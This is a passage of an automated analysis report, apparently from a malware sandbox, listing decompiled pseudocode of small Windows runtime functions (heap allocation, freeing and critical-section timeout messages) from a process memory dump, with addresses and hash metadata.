				void* _t14;

				_push(8);
				_push(0x49908f0);
				_t5 = E0490D08C(__ebx, __edi, __esi);
				if( *0x49a87ec == 0) {
					E048CEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
					if( *0x49a87ec == 0) {
						 *0x49a87f0 = 0x49a87ec;
						 *0x49a87ec = 0x49a87ec;
						 *0x49a87e8 = 0x49a87e4;
						 *0x49a87e4 = 0x49a87e4;
					}
					 *(_t14 - 4) = 0xfffffffe;
					_t5 = L04944248();
				}
				return E0490D0D1(_t5);
			}





                                                            0x049441e8
                                                            0x049441ea
                                                            0x049441ef
                                                            0x049441fb
                                                            0x04944206
                                                            0x0494420b
                                                            0x04944216
                                                            0x0494421d
                                                            0x04944222
                                                            0x0494422c
                                                            0x04944231
                                                            0x04944231
                                                            0x04944236
                                                            0x0494423d
                                                            0x0494423d
                                                            0x04944247

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.918229446.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: true
                                                            • Associated: 00000009.00000002.918369477.00000000049AB000.00000040.00000001.sdmp Download File
                                                            • Associated: 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3ac56e6358e2c3eb2ec37b9d2fe480a77c5a76908c3d4be76f63dfee6e760127
                                                            • Instruction ID: 2ce7e713139735ae5ace6c92e55e97335716cab4879864cf4e77dad057384c91
                                                            • Opcode Fuzzy Hash: 3ac56e6358e2c3eb2ec37b9d2fe480a77c5a76908c3d4be76f63dfee6e760127
                                                            • Instruction Fuzzy Hash: 30F0F274D25700CFEBA0FFAAE500B143AB4FBC4228F00823AC10486A84C778A9A0CF81
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0496D380, Relevance: .0, Instructions: 21COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E0496D380(void* __ecx, void* __edx, intOrPtr _a4) {
				void* _t5;

				if(_a4 != 0) {
					_t5 = L048BE8B0(__ecx, _a4, 0xfff);
					L048D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
					return _t5;
				}
				return 0xc000000d;
			}




                                                            0x0496d38a
                                                            0x0496d39b
                                                            0x0496d3b1
                                                            0x00000000
                                                            0x0496d3b6
                                                            0x00000000

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.918229446.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: true
                                                            • Associated: 00000009.00000002.918369477.00000000049AB000.00000040.00000001.sdmp Download File
                                                            • Associated: 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                            • Instruction ID: d2b9780ed468abfe1fab644b649185ede58f7852f2e46895d933db36d9a552bf
                                                            • Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                            • Instruction Fuzzy Hash: F3E0CD31341608BBEB215E48CC00FB57716DB50794F104531FD499A790C675BC51E6C4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 048EA185, Relevance: .0, Instructions: 20COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E048EA185() {
				void* __ecx;
				intOrPtr* _t5;

				if( *0x49a67e4 >= 0xa) {
					if(_t5 < 0x49a6800 || _t5 >= 0x49a6900) {
						return L048D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
					} else {
						goto L1;
					}
				} else {
					L1:
					return E048D0010(0x49a67e0, _t5);
				}
			}





                                                            0x048ea190
                                                            0x048ea1a6
                                                            0x048ea1c2
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x048ea192
                                                            0x048ea192
                                                            0x048ea19f
                                                            0x048ea19f

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.918229446.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: true
                                                            • Associated: 00000009.00000002.918369477.00000000049AB000.00000040.00000001.sdmp Download File
                                                            • Associated: 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7bca1c805d7c26a4cceec686c034bb5ada8763335aeda51ac8c89cb576299ea9
                                                            • Instruction ID: 20b2eb04ee02f836f1592abfba11222f0600c30639607c52e61f5b3cfc928e87
                                                            • Opcode Fuzzy Hash: 7bca1c805d7c26a4cceec686c034bb5ada8763335aeda51ac8c89cb576299ea9
                                                            • Instruction Fuzzy Hash: A2D02B221312005AF72C6705A814B352356E7C1B0CF354E2CF183DA590DE90FCF0818A
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 048E16E0, Relevance: .0, Instructions: 17COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E048E16E0(void* __edx, void* __eflags) {
				void* __ecx;
				void* _t3;

				_t3 = E048E1710(0x49a67e0);
				if(_t3 == 0) {
					_t6 =  *[fs:0x30];
					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
						goto L1;
					} else {
						return L048D4620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
					}
				} else {
					L1:
					return _t3;
				}
			}





                                                            0x048e16e8
                                                            0x048e16ef
                                                            0x048e16f3
                                                            0x048e16fe
                                                            0x00000000
                                                            0x048e1700
                                                            0x048e170d
                                                            0x048e170d
                                                            0x048e16f2
                                                            0x048e16f2
                                                            0x048e16f2
                                                            0x048e16f2

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.918229446.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: true
                                                            • Associated: 00000009.00000002.918369477.00000000049AB000.00000040.00000001.sdmp Download File
                                                            • Associated: 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a0a48623b0a42996b86c3dc899d1ab1f7f2b259f57d23e957b9a0275eb3acad5
                                                            • Instruction ID: bf62213f4a5a116d7485ca0b3a5bde76081d6ad09f56e69adca5ed8dfb58d93e
                                                            • Opcode Fuzzy Hash: a0a48623b0a42996b86c3dc899d1ab1f7f2b259f57d23e957b9a0275eb3acad5
                                                            • Instruction Fuzzy Hash: 76D0A73125120092FA2D5F169C48B342251DBC5B89F38096CF107D94E0CFF0FCA2E448
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 048E35A1, Relevance: .0, Instructions: 12COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E048E35A1(void* __eax, void* __ebx, void* __ecx) {
				void* _t6;
				void* _t10;
				void* _t11;

				_t10 = __ecx;
				_t6 = __eax;
				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
				}
				if( *((char*)(_t11 - 0x1a)) != 0) {
					return E048CEB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				}
				return _t6;
			}






                                                            0x048e35a1
                                                            0x048e35a1
                                                            0x048e35a5
                                                            0x048e35ab
                                                            0x048e35ab
                                                            0x048e35b5
                                                            0x00000000
                                                            0x048e35c1
                                                            0x048e35b7

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.918229446.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: true
                                                            • Associated: 00000009.00000002.918369477.00000000049AB000.00000040.00000001.sdmp Download File
                                                            • Associated: 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                                            • Instruction ID: 3b58cea94b16392e2f06fd9baec3480ee206708dc91f764aa20c8c2b11e62ba5
                                                            • Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                                            • Instruction Fuzzy Hash: 7DD0A931501184BAEB01AF15C21877833B2BB02308F582A69880287A52C37AAE0AD602
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 048CAAB0, Relevance: .0, Instructions: 12COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E048CAAB0() {
				intOrPtr* _t4;

				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t4 != 0) {
					if( *_t4 == 0) {
						goto L1;
					} else {
						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
					}
				} else {
					L1:
					return 0x7ffe0030;
				}
			}




                                                            0x048caab6
                                                            0x048caabb
                                                            0x0491a442
                                                            0x00000000
                                                            0x0491a448
                                                            0x0491a454
                                                            0x0491a454
                                                            0x048caac1
                                                            0x048caac1
                                                            0x048caac6
                                                            0x048caac6

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.918229446.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: true
                                                            • Associated: 00000009.00000002.918369477.00000000049AB000.00000040.00000001.sdmp Download File
                                                            • Associated: 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                                            • Instruction ID: 454a6eb4535b327f77d9c28158942bdb4b6b9261b49253f1a3dbec7b0b4313d3
                                                            • Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                                            • Instruction Fuzzy Hash: 3DD0E935352994CFD71ACF1DC554B1573A8BB44B44FC509A4E541CBB61E63DED84CA00
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0493A537, Relevance: .0, Instructions: 11COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E0493A537(intOrPtr _a4, intOrPtr _a8) {

				return L048D8E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
			}



                                                            0x0493a553

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.918229446.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: true
                                                            • Associated: 00000009.00000002.918369477.00000000049AB000.00000040.00000001.sdmp Download File
                                                            • Associated: 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                                            • Instruction ID: 4df639270a1e4e1091726d63570f15031690bb144f423966a22fde0fe52b6c5c
                                                            • Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                                            • Instruction Fuzzy Hash: FDC08C33080248BBCB127F85CC00F067F2AFB94B60F008410FA180B570C672E970EB84
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 048BDB40, Relevance: .0, Instructions: 11COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E048BDB40() {
				signed int* _t3;
				void* _t5;

				_t3 = L048D4620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
				if(_t3 == 0) {
					return 0;
				} else {
					 *_t3 =  *_t3 | 0x00000400;
					return _t3;
				}
			}





                                                            0x048bdb4d
                                                            0x048bdb54
                                                            0x048bdb5f
                                                            0x048bdb56
                                                            0x048bdb56
                                                            0x048bdb5c
                                                            0x048bdb5c

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.918229446.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: true
                                                            • Associated: 00000009.00000002.918369477.00000000049AB000.00000040.00000001.sdmp Download File
                                                            • Associated: 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                            • Instruction ID: d4b79949a0000fb71720e3b3fd4b6fb3c54ee5f0368b6320dced1457b55e9e33
                                                            • Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                            • Instruction Fuzzy Hash: 07C08C302C1A00AEFB221F20CD01B4037A0BB00F09F4409A06301DA0F0DBB8F801EA00
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 048BAD30, Relevance: .0, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E048BAD30(intOrPtr _a4) {

				return L048D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}



                                                            0x048bad49

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.918229446.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: true
                                                            • Associated: 00000009.00000002.918369477.00000000049AB000.00000040.00000001.sdmp Download File
                                                            • Associated: 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                            • Instruction ID: 42af769976b696c7a80b89aec24b9be07749afbf06a340a4f8fd204c426efec3
                                                            • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                            • Instruction Fuzzy Hash: 68C08C32080248BBC7126A49CD00F01BB29E790B60F000420B6044A6618A72E860D588
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 048E36CC, Relevance: .0, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E048E36CC(void* __ecx) {

				if(__ecx > 0x7fffffff) {
					return 0;
				} else {
					return L048D4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
			}



                                                            0x048e36d2
                                                            0x048e36e8
                                                            0x048e36d4
                                                            0x048e36e5
                                                            0x048e36e5

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.918229446.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: true
                                                            • Associated: 00000009.00000002.918369477.00000000049AB000.00000040.00000001.sdmp Download File
                                                            • Associated: 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                                            • Instruction ID: 0ca238432a9c62a8a30618d3e704c2e4c6f8d8a434e714d5a1b4fa8a2c49f5db
                                                            • Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                                            • Instruction Fuzzy Hash: 34C02B70191440FBFB151F30CD40F247354F700E21F640B547221CA4F0D578BC00E500
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 048C76E2, Relevance: .0, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E048C76E2(void* __ecx) {
				void* _t5;

				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
					return L048D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
				return _t5;
			}




                                                            0x048c76e4
                                                            0x00000000
                                                            0x048c76f8
                                                            0x048c76fd

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.918229446.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: true
                                                            • Associated: 00000009.00000002.918369477.00000000049AB000.00000040.00000001.sdmp Download File
                                                            • Associated: 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                                            • Instruction ID: 301a497db443e54ffc0c7a98d4068fb48b4120097002c27ab59aca1736da4a93
                                                            • Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                                            • Instruction Fuzzy Hash: 06C08C701421855AEB2A6B08CE22F203650AB08708F880B9CAA01894A1C3B8F802CA08
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 048D3A1C, Relevance: .0, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E048D3A1C(intOrPtr _a4) {
				void* _t5;

				return L048D4620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}




                                                            0x048d3a35

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.918229446.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: true
                                                            • Associated: 00000009.00000002.918369477.00000000049AB000.00000040.00000001.sdmp Download File
                                                            • Associated: 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                            • Instruction ID: 1a17e15d23252331d1df5637e473ca1fbdc615f0ae0ad9efa88b0f73760ee590
                                                            • Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                            • Instruction Fuzzy Hash: 82C08C32080248BBD7126E45EC00F017B29E790B60F000020B6040A5608572EC60D988
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 048D7D50, Relevance: .0, Instructions: 7COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E048D7D50() {
				intOrPtr* _t3;

				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t3 != 0) {
					return  *_t3;
				} else {
					return _t3;
				}
			}




                                                            0x048d7d56
                                                            0x048d7d5b
                                                            0x048d7d60
                                                            0x048d7d5d
                                                            0x048d7d5d
                                                            0x048d7d5d

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.918229446.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: true
                                                            • Associated: 00000009.00000002.918369477.00000000049AB000.00000040.00000001.sdmp Download File
                                                            • Associated: 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                            • Instruction ID: 19a9f49a61bafdbbb494f804393ee5ae1777a1c5f18034473508261f0cf6473e
                                                            • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                            • Instruction Fuzzy Hash: 46B092343029808FCF16DF18C080B1533E4BB45A40B8404D4E401CBA20D229E8008900
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0494FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 53%
                                                            			E0494FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E048FCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E04945720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E04945720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                            0x0494fdda
                                                            0x0494fde2
                                                            0x0494fde5
                                                            0x0494fdec
                                                            0x0494fdfa
                                                            0x0494fdff
                                                            0x0494fe0a
                                                            0x0494fe0f
                                                            0x0494fe17
                                                            0x0494fe1e
                                                            0x0494fe19
                                                            0x0494fe19
                                                            0x0494fe19
                                                            0x0494fe20
                                                            0x0494fe21
                                                            0x0494fe22
                                                            0x0494fe25
                                                            0x0494fe40

                                                            APIs
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0494FDFA
                                                            Strings
                                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0494FE2B
                                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0494FE01
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.918229446.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: true
                                                            • Associated: 00000009.00000002.918369477.00000000049AB000.00000040.00000001.sdmp Download File
                                                            • Associated: 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                            • API String ID: 885266447-3903918235
                                                            • Opcode ID: a30c8a0fff8b1055e72ac0aa80fd0ecc42e68a634dc5b71819141b1c23665902
                                                            • Instruction ID: 98b88b217a4d56903408fac228e880dcb50efb1a35aab0c67ab48a27cc3be5b4
                                                            • Opcode Fuzzy Hash: a30c8a0fff8b1055e72ac0aa80fd0ecc42e68a634dc5b71819141b1c23665902
                                                            • Instruction Fuzzy Hash: 29F0F632640201BFEA201A85DC06F23BB5AEBC4730F150724F728966D1EAA2F930D6F4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%